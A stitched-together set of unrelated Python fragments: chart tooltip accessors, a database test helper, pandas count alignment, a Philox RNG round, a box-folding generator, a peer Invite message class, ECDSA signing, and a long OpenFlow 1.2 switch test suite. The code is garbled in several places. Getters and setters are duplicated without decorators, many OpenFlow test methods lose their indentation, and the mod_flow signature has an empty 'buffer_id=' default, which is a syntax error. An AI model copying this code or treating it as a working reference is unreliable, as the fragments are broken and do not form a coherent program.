    def format(self, text: str):
        self._config(text, js_type=False)
    def headerFormat(self):
        return self._config_get(None)
    def headerFormat(self, text: str):
        self._config(text, js_type=False)
    def nullFormat(self):
        return self._config_get(None)
    def nullFormat(self, text: str):
        self._config(text, js_type=False)
    def nullFormatter(self):
        return self._config_get(None)
    def nullFormatter(self, value: Any):
        self._config(value, js_type=False)
    def pointFormat(self):
        return self._config_get('<span style="color:{point.color}"></span> {series.name}<br/>Value: {point.y}<br/>Size: {point.z}<br/>')
    def pointFormat(self, text: str):
        self._config(text, js_type=False)
    def pointFormatter(self):
        return self._config_get(None)
    def pointFormatter(self, value: Any):
        self._config(value, js_type=False)
    def valueDecimals(self):
        return self._config_get(None)
    def valueDecimals(self, num: float):
        self._config(num, js_type=False)
    def valuePrefix(self):
        return self._config_get(None)
    def valuePrefix(self, text: str):
        self._config(text, js_type=False)
    def valueSuffix(self):
        return self._config_get(None)
    def valueSuffix(self, text: str):
        self._config(text, js_type=False)
    def xDateFormat(self):
        return self._config_get(None)
    def xDateFormat(self, text: str):
        self._config(text, js_type=False)
def add_resource_b(db_session, resource_id, resource_name='test_resource'):
    """Create a ResourceTestobjB row, add and flush it; returns the instance.

    Also (re)sets the class-wide permission whitelist used by the tests.
    """
    Resource.__possible_permissions__ = [
        'test_perm', 'test_perm1', 'test_perm2',
        'foo_perm', 'group_perm', 'group_perm2',
    ]
    new_resource = ResourceTestobjB(resource_id=resource_id, resource_name=resource_name)
    db_session.add(new_resource)
    db_session.flush()
    return new_resource
def get_matched_value_counts(value_counts: pd.Series, other_to_match: pd.Series) -> pd.Series:
    """Align *value_counts* onto the index of *other_to_match*.

    Labels absent from value_counts get 0.0; the OTHERS_GROUPED bucket (when
    present in the target index) absorbs whatever total count is left over.
    """
    matched_series = pd.Series(index=other_to_match.index, dtype=float)
    for label in matched_series.index:
        matched_series[label] = value_counts[label] if label in value_counts else 0.0
    if OTHERS_GROUPED in matched_series.index:
        # remainder of the grand total not captured by the named labels
        leftover = sum(value_counts) - sum(matched_series)
        matched_series[OTHERS_GROUPED] = leftover
    return matched_series
def philox_round(W, N, rnd, ctr, key):
    """One round of the Philox W-bit, N-word counter-based RNG.

    W:   word width in bits
    N:   number of counter words (2 or 4)
    rnd: round index, mixed into the key via the PHILOX_W constants
    ctr: counter words (numpy array); a bumped copy is returned
    key: key words
    """
    ctr = ctr.copy()
    # numpy.cast was removed in NumPy 2.0; numpy.asarray(..., dtype=...) is
    # the documented drop-in replacement and yields the same casted value.
    rnd = numpy.asarray(rnd, dtype=ctr.dtype)
    if (N == 2):
        key0 = (key[0] + (PHILOX_W[W][0] * rnd))
        (hi, lo) = philox_mulhilo(W, PHILOX_M[(W, N)][0], ctr[0])
        ctr[0] = ((hi ^ key0) ^ ctr[1])
        ctr[1] = lo
    else:
        key0 = (key[0] + (PHILOX_W[W][0] * rnd))
        key1 = (key[1] + (PHILOX_W[W][1] * rnd))
        (hi0, lo0) = philox_mulhilo(W, PHILOX_M[(W, N)][0], ctr[0])
        (hi1, lo1) = philox_mulhilo(W, PHILOX_M[(W, N)][1], ctr[2])
        # note the cross-lane mixing: word 0 uses hi1, word 2 uses hi0
        ctr[0] = ((hi1 ^ ctr[1]) ^ key0)
        ctr[1] = lo1
        ctr[2] = ((hi0 ^ ctr[3]) ^ key1)
        ctr[3] = lo0
    return ctr
class Folder(Boxes):
    """Folder box generator: two flat faces joined by a flexed spine."""
    def __init__(self) -> None:
        Boxes.__init__(self)
        self.addSettingsArgs(edges.FlexSettings)
        self.buildArgParser('x', 'y', 'h')
        self.argparser.add_argument('--r', action='store', type=float, default=10.0, help='radius of the corners')
        self.argparser.set_defaults(h=20)
    def render(self):
        """Draw the unfolded outline: two x-wide faces, a flex spine of
        length pi*h between them, and rounded corners of radius r."""
        (x, y, r, h) = (self.x, self.y, self.r, self.h)
        # spine length = half circumference of a circle with diameter 2h
        c2 = (math.pi * h)
        self.moveTo((r + self.thickness), self.thickness)
        self.edge((x - r))
        self.edges['X'](c2, y)  # flex edge forming the spine
        self.edge((x - r))
        self.corner(90, r)
        self.edge((y - (2 * r)))
        self.corner(90, r)
        self.edge((((2 * x) - (2 * r)) + c2))
        self.corner(90, r)
        self.edge((y - (2 * r)))
        self.corner(90, r)
class Invite(object):
    """Invite message: fixed-size Header plus binary-plist InviteData payload."""
    SIGNATURE = 2100  # message-type signature carried in the header

    # NOTE(review): called without self (Invite.build(...)) — presumably a
    # @staticmethod whose decorator was lost in extraction; confirm upstream.
    def build(server_peer_id: PeerID, client_peer_id: PeerID) -> Invite:
        """Construct a checksummed Invite for the given server/client peers."""
        data = InviteData(server_peer_id, client_peer_id)
        header = Header.build(Invite.SIGNATURE, 0, len(data.to_binary_plist()))
        msg = Invite(header, data)
        msg.fix_checksum()
        return msg
    def __init__(self, header: Header, data: InviteData):
        self.header = header
        self.data = data
    def fix_checksum(self) -> None:
        """Recompute the header CRC32 over the message with the CRC field zeroed."""
        self.header._cfields['crc32'] = 0
        without_crc = self.to_raw_data()
        self.header._cfields['crc32'] = zlib.crc32(without_crc)
    def to_raw_data(self) -> bytes:
        """Serialize: raw header bytes followed by the binary-plist payload."""
        return (self.header.to_raw_data() + self.data.to_binary_plist())
    def print(self, full=False) -> None:
        """Dump header and payload for debugging (header only unless full)."""
        print('')
        if full:
            print(' ')
        self.header.print()
        self.data.print()
def ecdsa_raw_sign(msg_hash: bytes, private_key_bytes: bytes) -> Tuple[(int, int, int)]:
    """ECDSA-sign *msg_hash* with a deterministically derived nonce.

    Returns (v, r, s): r, s are the signature integers with s canonicalized
    to the low half of the curve order, and v is the recovery id (0 or 1)
    derived from the parity of the nonce point's y coordinate.
    """
    z = big_endian_to_int(msg_hash)
    # deterministic nonce (presumably RFC 6979-style — confirm in helper)
    k = deterministic_generate_k(msg_hash, private_key_bytes)
    (r, y) = fast_multiply(G, k)
    s_raw = ((inv(k, N) * (z + (r * big_endian_to_int(private_key_bytes)))) % N)
    # flip the recovery bit if s is normalized below, so (r, s, v) stays consistent
    v = (27 + ((y % 2) ^ (0 if ((s_raw * 2) < N) else 1)))
    # low-s normalization: use N - s when s is in the upper half of the order
    s = (s_raw if ((s_raw * 2) < N) else (N - s_raw))
    return ((v - 27), r, s)
class RunTest(tester.TestFlowBase):
OFP_VERSIONS = [ofproto_v1_2.OFP_VERSION]
    def __init__(self, *args, **kwargs):
        """Initialize the OF1.2 test runner; _verify holds the per-test expectation."""
        super(RunTest, self).__init__(*args, **kwargs)
        self._verify = None
        self.n_tables = ofproto_v1_2.OFPTT_MAX
    def start_next_test(self, dp):
        """Reset switch state and run the next pending test, skipping
        unsupported ones; print the summary when the queue is empty."""
        self._verify = None
        self.delete_all_flows(dp)
        dp.send_barrier()
        if len(self.pending):
            t = self.pending.pop()
            if self.is_supported(t):
                LOG.info(tester.LOG_TEST_START, t)
                self.current = t
                # invoke the test method by name
                getattr(self, t)(dp)
            else:
                self.results[t] = 'SKIP (unsupported)'
                self.unclear -= 1
                self.start_next_test(dp)
        else:
            self.print_results()
    def run_verify(self, ev):
        """Dispatch a reply event to the matching verify_* method (or
        verify_default), record the result, then start the next test."""
        msg = ev.msg
        dp = msg.datapath
        verify_func = self.verify_default
        # 'test_foo' pairs with 'verify_foo' when one is defined
        v = ('verify' + self.current[4:])
        if (v in dir(self)):
            verify_func = getattr(self, v)
        result = verify_func(dp, msg)
        if (result is True):
            self.unclear -= 1
        self.results[self.current] = result
        self.start_next_test(dp)
def verify_default(self, dp, msg):
type_ = self._verify
if (msg.msg_type == dp.ofproto.OFPT_STATS_REPLY):
return self.verify_stats(dp, msg.body, type_)
elif (msg.msg_type == type_):
return True
else:
return ('Reply msg_type %s expected %s' % (msg.msg_type, type_))
def verify_stats(self, dp, stats, type_):
stats_types = dp.ofproto_parser.OFPStatsReply._STATS_TYPES
expect = stats_types.get(type_).__name__
if isinstance(stats, list):
for s in stats:
if (expect == s.__class__.__name__):
return True
elif (expect == stats.__class__.__name__):
return True
return ("Reply msg has not '%s' class.\n%s" % (expect, stats))
def mod_flow(self, dp, cookie=0, cookie_mask=0, table_id=0, command=None, idle_timeout=0, hard_timeout=0, priority=255, buffer_id=, match=None, actions=None, inst_type=None, out_port=None, out_group=None, flags=0, inst=None):
if (command is None):
command = dp.ofproto.OFPFC_ADD
if (inst is None):
if (inst_type is None):
inst_type = dp.ofproto.OFPIT_APPLY_ACTIONS
inst = []
if (actions is not None):
inst = [dp.ofproto_parser.OFPInstructionActions(inst_type, actions)]
if (match is None):
match = dp.ofproto_parser.OFPMatch()
if (out_port is None):
out_port = dp.ofproto.OFPP_ANY
if (out_group is None):
out_group = dp.ofproto.OFPG_ANY
m = dp.ofproto_parser.OFPFlowMod(dp, cookie, cookie_mask, table_id, command, idle_timeout, hard_timeout, priority, buffer_id, out_port, out_group, flags, match, inst)
dp.send_msg(m)
def get_port(self, dp):
for (port_no, port) in dp.ports.items():
if (port_no != dp.ofproto.OFPP_LOCAL):
return port
return None
def test_desc_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_DESC
m = dp.ofproto_parser.OFPDescStatsRequest(dp)
dp.send_msg(m)
    def test_flow_stats_request(self, dp):
        """Install one default flow, then expect an OFPST_FLOW reply."""
        self._verify = dp.ofproto.OFPST_FLOW
        self.mod_flow(dp)
        self.send_flow_stats(dp)
def test_aggregate_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_AGGREGATE
match = dp.ofproto_parser.OFPMatch()
m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, dp.ofproto.OFPP_ANY, dp.ofproto.OFPG_ANY, 0, 0, match)
dp.send_msg(m)
def test_table_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_TABLE
m = dp.ofproto_parser.OFPTableStatsRequest(dp)
dp.send_msg(m)
def test_port_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_PORT
m = dp.ofproto_parser.OFPPortStatsRequest(dp, dp.ofproto.OFPP_ANY)
dp.send_msg(m)
def test_echo_request(self, dp):
self._verify = dp.ofproto.OFPT_ECHO_REPLY
m = dp.ofproto_parser.OFPEchoRequest(dp)
dp.send_msg(m)
def test_features_request(self, dp):
self._verify = dp.ofproto.OFPT_FEATURES_REPLY
m = dp.ofproto_parser.OFPFeaturesRequest(dp)
dp.send_msg(m)
def test_get_config_request(self, dp):
self._verify = dp.ofproto.OFPT_GET_CONFIG_REPLY
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def test_barrier_request(self, dp):
self._verify = dp.ofproto.OFPT_BARRIER_REPLY
dp.send_barrier()
def test_error_reply(self, dp):
ports = [0]
for p in dp.ports:
if (p != dp.ofproto.OFPP_LOCAL):
ports.append(p)
port_no = (max(ports) + 1)
self._verify = dp.ofproto.OFPT_ERROR
m = dp.ofproto_parser.OFPPortMod(dp, port_no, 'ff:ff:ff:ff:ff:ff', 0, 0, 0)
dp.send_msg(m)
    def test_flow_stats_none(self, dp):
        """Request flow stats with no flows installed (empty-body case)."""
        self.send_flow_stats(dp)
def verify_flow_stats_none(self, dp, msg):
stats = msg.body
if len(stats):
return ('Reply msg has body. %s' % (stats,))
return True
def test_flow_stats_reply_value(self, dp):
self._verify = []
c = 0
while (c < self.n_tables):
v = (c, (c + 1), (c + 2), (c + 3), (c + 4))
self._verify.append(v)
self.mod_flow(dp, table_id=v[0], cookie=v[1], idle_timeout=v[2], hard_timeout=v[3], priority=v[4])
c += 1
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_stats_reply_value(self, dp, msg):
c = 0
for f in msg.body:
f_value = (f.table_id, f.cookie, f.idle_timeout, f.hard_timeout, f.priority)
if (f_value != self._verify[c]):
return ('param is mismatched. verify=%s, reply=%s' % (self._verify[c], f_value))
c += 1
return (len(msg.body) == self.n_tables)
def test_echo_request_has_data(self, dp):
    # Echo reply must carry back the request payload unchanged.
    data = 'test'
    self._verify = data
    m = dp.ofproto_parser.OFPEchoRequest(dp)
    m.data = data
    dp.send_msg(m)
def verify_echo_request_has_data(self, dp, msg):
    data = msg.data
    return (self._verify == data)
def test_aggregate_stats_flow_count(self, dp):
    # One flow per table -> aggregate flow_count must equal n_tables.
    c = 0
    while (c < self.n_tables):
        self.mod_flow(dp, table_id=c)
        c += 1
    dp.send_barrier()
    match = dp.ofproto_parser.OFPMatch()
    m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, dp.ofproto.OFPP_ANY, dp.ofproto.OFPG_ANY, 0, 0, match)
    dp.send_msg(m)
def verify_aggregate_stats_flow_count(self, dp, msg):
    stats = msg.body
    return (stats.flow_count == self.n_tables)
def test_aggregate_stats_flow_count_out_port(self, dp):
    # Two flows with different output ports; filtering the aggregate
    # request by out_port=2 must match exactly one of them.
    actions = [dp.ofproto_parser.OFPActionOutput(1, 1500)]
    self.mod_flow(dp, table_id=1, actions=actions)
    actions = [dp.ofproto_parser.OFPActionOutput(2, 1500)]
    self.mod_flow(dp, table_id=2, actions=actions)
    dp.send_barrier()
    out_port = 2
    match = dp.ofproto_parser.OFPMatch()
    m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, out_port, dp.ofproto.OFPG_ANY, 0, 0, match)
    dp.send_msg(m)
def verify_aggregate_stats_flow_count_out_port(self, dp, msg):
    stats = msg.body
    return (stats.flow_count == 1)
def test_aggregate_stats_packet_count(self, dp):
    """Push one packet through table 0 and verify the aggregate counters.

    Fix: the OFPPacketOut constructor was missing its buffer_id argument
    (a syntax error).  0xffffffff (OFP_NO_BUFFER) is used because the
    full packet payload is supplied inline.
    """
    in_port = 1
    data = 'test'
    self._verify = {'packet_count': 1, 'byte_count': len(data)}
    match = dp.ofproto_parser.OFPMatch()
    match.set_in_port(in_port)
    self.mod_flow(dp, table_id=0, match=match)
    output = dp.ofproto.OFPP_TABLE
    actions = [dp.ofproto_parser.OFPActionOutput(output, 0)]
    m = dp.ofproto_parser.OFPPacketOut(dp, 0xffffffff, in_port, actions, data)
    dp.send_msg(m)
    dp.send_barrier()
    match = dp.ofproto_parser.OFPMatch()
    m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, dp.ofproto.OFPP_ANY, dp.ofproto.OFPG_ANY, 0, 0, match)
    dp.send_msg(m)
def verify_aggregate_stats_packet_count(self, dp, msg):
    """Check each expected counter in self._verify against the stats body.

    Returns True when all counters match, otherwise an error string
    describing the first mismatch.
    """
    stats = msg.body
    for name, expected in self._verify.items():
        actual = getattr(stats, name)
        if (expected != actual):
            return ('%s is mismatched. verify=%s, reply=%s' % (name, expected, actual))
    return True
# --- OFPSetConfig tests ---------------------------------------------------
# Each test sets a config flag (or miss_send_len), then issues a
# GetConfigRequest; the verify method compares the echoed value.
def test_set_config_nomal(self, dp):
    flags = dp.ofproto.OFPC_FRAG_NORMAL
    self._verify = flags
    m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
    dp.send_msg(m)
    dp.send_barrier()
    m = dp.ofproto_parser.OFPGetConfigRequest(dp)
    dp.send_msg(m)
def verify_set_config_nomal(self, dp, msg):
    return (self._verify == msg.flags)
def test_set_config_drop(self, dp):
    flags = dp.ofproto.OFPC_FRAG_DROP
    self._verify = flags
    m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
    dp.send_msg(m)
    dp.send_barrier()
    m = dp.ofproto_parser.OFPGetConfigRequest(dp)
    dp.send_msg(m)
def verify_set_config_drop(self, dp, msg):
    return (self._verify == msg.flags)
def test_set_config_mask(self, dp):
    flags = dp.ofproto.OFPC_FRAG_MASK
    self._verify = flags
    m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
    dp.send_msg(m)
    dp.send_barrier()
    m = dp.ofproto_parser.OFPGetConfigRequest(dp)
    dp.send_msg(m)
def verify_set_config_mask(self, dp, msg):
    return (self._verify == msg.flags)
def test_set_config_ttl_to_controller(self, dp):
    flags = dp.ofproto.OFPC_INVALID_TTL_TO_CONTROLLER
    self._verify = flags
    m = dp.ofproto_parser.OFPSetConfig(dp, flags, 0)
    dp.send_msg(m)
    dp.send_barrier()
    m = dp.ofproto_parser.OFPGetConfigRequest(dp)
    dp.send_msg(m)
def verify_set_config_ttl_to_controller(self, dp, msg):
    return (self._verify == msg.flags)
def test_set_config_miss_send_len(self, dp):
    flags = dp.ofproto.OFPC_FRAG_NORMAL
    ms_len = 256
    self._verify = ms_len
    m = dp.ofproto_parser.OFPSetConfig(dp, flags, ms_len)
    dp.send_msg(m)
    dp.send_barrier()
    m = dp.ofproto_parser.OFPGetConfigRequest(dp)
    dp.send_msg(m)
def verify_set_config_miss_send_len(self, dp, msg):
    return (self._verify == msg.miss_send_len)
def test_set_config_miss_send_len_max(self, dp):
    flags = dp.ofproto.OFPC_FRAG_NORMAL
    ms_len = dp.ofproto.OFPCML_MAX
    self._verify = ms_len
    m = dp.ofproto_parser.OFPSetConfig(dp, flags, ms_len)
    dp.send_msg(m)
    dp.send_barrier()
    m = dp.ofproto_parser.OFPGetConfigRequest(dp)
    dp.send_msg(m)
def verify_set_config_miss_send_len_max(self, dp, msg):
    return (self._verify == msg.miss_send_len)
def test_set_config_no_buffer(self, dp):
    flags = dp.ofproto.OFPC_FRAG_NORMAL
    ms_len = dp.ofproto.OFPCML_NO_BUFFER
    self._verify = ms_len
    m = dp.ofproto_parser.OFPSetConfig(dp, flags, ms_len)
    dp.send_msg(m)
    dp.send_barrier()
    m = dp.ofproto_parser.OFPGetConfigRequest(dp)
    dp.send_msg(m)
def verify_set_config_no_buffer(self, dp, msg):
    return (self._verify == msg.miss_send_len)
def _verify_flow_inst_type(self, dp, msg):
    # Succeed when any returned flow carries an instruction whose type
    # equals the expected value stashed in self._verify.
    inst_type = self._verify
    stats = msg.body
    for s in stats:
        for i in s.instructions:
            if (i.type == inst_type):
                return True
    return ('not found inst_type[%s]' % (inst_type,))
def test_flow_add_apply_actions(self, dp):
    inst_type = dp.ofproto.OFPIT_APPLY_ACTIONS
    self._verify = inst_type
    actions = [dp.ofproto_parser.OFPActionOutput(1, 1500)]
    self.mod_flow(dp, actions=actions, inst_type=inst_type)
    self.send_flow_stats(dp)
def verify_flow_add_apply_actions(self, dp, msg):
    return self._verify_flow_inst_type(dp, msg)
def test_flow_add_goto_table(self, dp):
    self._verify = dp.ofproto.OFPIT_GOTO_TABLE
    inst = [dp.ofproto_parser.OFPInstructionGotoTable(1)]
    self.mod_flow(dp, inst=inst)
    self.send_flow_stats(dp)
def verify_flow_add_goto_table(self, dp, msg):
    return self._verify_flow_inst_type(dp, msg)
def _verify_flow_value(self, dp, msg):
    # Compare flow count and, per table, the output-action port recorded
    # in self._verify (see _add_flow_for_flow_mod_tests layout).
    stats = msg.body
    verify = self._verify
    if (len(verify) != len(stats)):
        return ('flow_count is mismatched. verify=%s stats=%s' % (len(verify), len(stats)))
    for s in stats:
        v_port = (- 1)
        v = verify.get(s.table_id, None)
        if v:
            v_port = v[3].port
        s_port = s.instructions[0].actions[0].port
        if (v_port != s_port):
            return ('port is mismatched. table_id=%s verify=%s, stats=%s' % (s.table_id, v_port, s_port))
    return True
def _add_flow_for_flow_mod_tests(self, dp):
    # Seed tables 0..3 with flows; each verify entry is
    # [cookie, priority, dl_dst, output-action].
    a1 = dp.ofproto_parser.OFPActionOutput(1, 1500)
    a2 = dp.ofproto_parser.OFPActionOutput(2, 1500)
    tables = {0: [65535, 10, (b'\xee' * 6), a1], 1: [65280, 10, (b'\xee' * 6), a2], 2: [61440, 100, (b'\xee' * 6), a1], 3: [0, 10, (b'\xff' * 6), a1]}
    self._verify = tables
    for (table_id, val) in tables.items():
        match = dp.ofproto_parser.OFPMatch()
        match.set_dl_dst(val[2])
        self.mod_flow(dp, match=match, actions=[val[3]], table_id=table_id, cookie=val[0], priority=val[1])
    dp.send_barrier()
# --- OFPFC_MODIFY / OFPFC_DELETE tests ------------------------------------
# All of these seed the four-table layout from
# _add_flow_for_flow_mod_tests, mutate one aspect (table_id, cookie,
# match, strictness, out_port), update self._verify to the expected final
# state, and then compare against a flow-stats dump.
def test_flow_mod_table_id(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    action = dp.ofproto_parser.OFPActionOutput(3, 1500)
    self._verify[3][3] = action
    table_id = 3
    self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_mod_table_id(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_mod_cookie(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    action = dp.ofproto_parser.OFPActionOutput(3, 1500)
    self._verify[1][3] = action
    cookie = 65280
    cookie_mask = 65535
    table_id = 1
    self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id, cookie=cookie, cookie_mask=cookie_mask)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_mod_cookie(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_mod_cookie_mask(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    action = dp.ofproto_parser.OFPActionOutput(3, 1500)
    # The partial mask 0xff00 matches the flows in tables 0 and 1.
    self._verify[0][3] = action
    self._verify[1][3] = action
    cookie = 65535
    cookie_mask = 65280
    for table_id in range(2):
        self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id, cookie=cookie, cookie_mask=cookie_mask)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_mod_cookie_mask(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_mod_match(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    action = dp.ofproto_parser.OFPActionOutput(3, 1500)
    self._verify[3][3] = action
    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_dst((b'\xff' * 6))
    table_id = 3
    self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY, actions=[action], table_id=table_id, match=match)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_mod_match(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_mod_strict(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    action = dp.ofproto_parser.OFPActionOutput(3, 1500)
    self._verify[2][3] = action
    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_dst((b'\xee' * 6))
    priority = 100
    table_id = 2
    self.mod_flow(dp, command=dp.ofproto.OFPFC_MODIFY_STRICT, actions=[action], table_id=table_id, match=match, priority=priority)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_mod_strict(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_del_table_id(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    del self._verify[3]
    table_id = 3
    self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=table_id)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_del_table_id(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_del_table_id_all(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    self._verify = {}
    self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_del_table_id_all(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_del_cookie(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    del self._verify[1]
    cookie = 65280
    cookie_mask = 65535
    self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, cookie=cookie, cookie_mask=cookie_mask)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_del_cookie(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_del_cookie_mask(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    del self._verify[0]
    del self._verify[1]
    cookie = 65535
    cookie_mask = 65280
    self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, cookie=cookie, cookie_mask=cookie_mask)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_del_cookie_mask(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_del_match(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    del self._verify[3]
    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_dst((b'\xff' * 6))
    self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, match=match)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_del_match(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_del_out_port(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    # Only table 1 outputs to port 2, so only it should be deleted.
    del self._verify[1]
    out_port = 2
    self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE, table_id=dp.ofproto.OFPTT_ALL, out_port=out_port)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_del_out_port(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def test_flow_del_strict(self, dp):
    self._add_flow_for_flow_mod_tests(dp)
    del self._verify[2]
    match = dp.ofproto_parser.OFPMatch()
    match.set_dl_dst((b'\xee' * 6))
    priority = 100
    self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT, table_id=dp.ofproto.OFPTT_ALL, match=match, priority=priority)
    dp.send_barrier()
    self.send_flow_stats(dp)
def verify_flow_del_strict(self, dp, msg):
    return self._verify_flow_value(dp, msg)
def _send_port_mod(self, dp, config, mask):
    # Apply a port-config change to the first attached port, then request
    # features so the verify step can inspect the echoed port config.
    p = self.get_port(dp)
    if (not p):
        err = 'need attached port to switch.'
        self.results[self.current] = err
        self.start_next_test(dp)
        return
    self._verify = [p.port_no, (config & mask)]
    m = dp.ofproto_parser.OFPPortMod(dp, p.port_no, p.hw_addr, config, mask, 0)
    dp.send_msg(m)
    dp.send_barrier()
    # Give the switch a moment to apply the port change before querying.
    time.sleep(1)
    m = dp.ofproto_parser.OFPFeaturesRequest(dp)
    dp.send_msg(m)
def _verify_port_mod_config(self, dp, msg):
    port_no = self._verify[0]
    config = self._verify[1]
    port = msg.ports[port_no]
    if (config != port.config):
        return ('config is mismatched. verify=%s, stats=%s' % (bin(config), bin(port.config)))
    return True
def test_port_mod_config_01_all(self, dp):
    # 0b1100101: set all currently-defined config bits.
    config = 101
    mask = 127
    self._send_port_mod(dp, config, mask)
def verify_port_mod_config_01_all(self, dp, msg):
    return self._verify_port_mod_config(dp, msg)
def test_port_mod_config_02_none(self, dp):
    config = 0
    mask = 127
    self._send_port_mod(dp, config, mask)
def verify_port_mod_config_02_none(self, dp, msg):
    return self._verify_port_mod_config(dp, msg)
def test_port_mod_config_03_mask(self, dp):
    config = 101
    mask = 120
    self._send_port_mod(dp, config, mask)
def verify_port_mod_config_03_mask(self, dp, msg):
    res = self._verify_port_mod_config(dp, msg)
    # Restore the port config so later tests start from a clean state.
    port_no = self._verify[0]
    p = msg.ports[port_no]
    m = dp.ofproto_parser.OFPPortMod(dp, p.port_no, p.hw_addr, 0, 127, 0)
    dp.send_msg(m)
    dp.send_barrier()
    return res
def test_port_stats_port_no(self, dp):
    p = self.get_port(dp)
    if (not p):
        err = 'need attached port to switch.'
        self.results[self.current] = err
        self.start_next_test(dp)
        return
    self._verify = p.port_no
    m = dp.ofproto_parser.OFPPortStatsRequest(dp, p.port_no)
    dp.send_msg(m)
def verify_port_stats_port_no(self, dp, msg):
    ports = msg.body
    if (len(ports) > 1):
        return ('reply some ports.\n%s' % ports)
    if (ports[0].port_no != self._verify):
        return ('port_no is mismatched. request=%s reply=%s' % (self._verify, ports[0].port_no))
    return True
def _add_flow_flow_removed(self, dp, reason, table_id=0, cookie=255, priority=100, in_port=1, idle_timeout=0, hard_timeout=0):
    # Install a flow with OFPFF_SEND_FLOW_REM so removing it (timeout or
    # delete) produces an OFPFlowRemoved that _verify_flow_removed checks.
    self._verify = {}
    self._verify['params'] = {'reason': reason, 'table_id': table_id, 'cookie': cookie, 'priority': priority}
    self._verify['in_port'] = in_port
    self._verify['timeout'] = idle_timeout
    if hard_timeout:
        # The effective expiry is whichever timeout fires first.
        if ((idle_timeout == 0) or (idle_timeout > hard_timeout)):
            self._verify['timeout'] = hard_timeout
    match = dp.ofproto_parser.OFPMatch()
    match.set_in_port(in_port)
    self.mod_flow(dp, match=match, cookie=cookie, priority=priority, table_id=table_id, idle_timeout=idle_timeout, hard_timeout=hard_timeout, flags=dp.ofproto.OFPFF_SEND_FLOW_REM)
def _verify_flow_removed(self, dp, msg):
    params = self._verify['params']
    in_port = self._verify['in_port']
    timeout = self._verify['timeout']
    if timeout:
        # Accept a [-0.5s, +1.5s] window around the configured timeout.
        duration_nsec = ((msg.duration_sec * (10 ** 9)) + msg.duration_nsec)
        timeout_nsec = (timeout * (10 ** 9))
        l = ((timeout - 0.5) * (10 ** 9))
        h = ((timeout + 1.5) * (10 ** 9))
        if (not (l < duration_nsec < h)):
            return ('bad duration time. set=%s(nsec), duration=%s(nsec)' % (timeout_nsec, duration_nsec))
    for (name, val) in params.items():
        r_val = getattr(msg, name)
        if (val != r_val):
            return ('%s is mismatched. verify=%s, reply=%s' % (name, val, r_val))
    for f in msg.match.fields:
        if (f.header == ofproto_v1_2.OXM_OF_IN_PORT):
            if (f.value != in_port):
                return ('in_port is mismatched. verify=%s, reply=%s' % (in_port, f.value))
    return True
def test_flow_removed_idle_timeout(self, dp):
    reason = dp.ofproto.OFPRR_IDLE_TIMEOUT
    idle_timeout = 2
    self._add_flow_flow_removed(dp, reason, idle_timeout=idle_timeout)
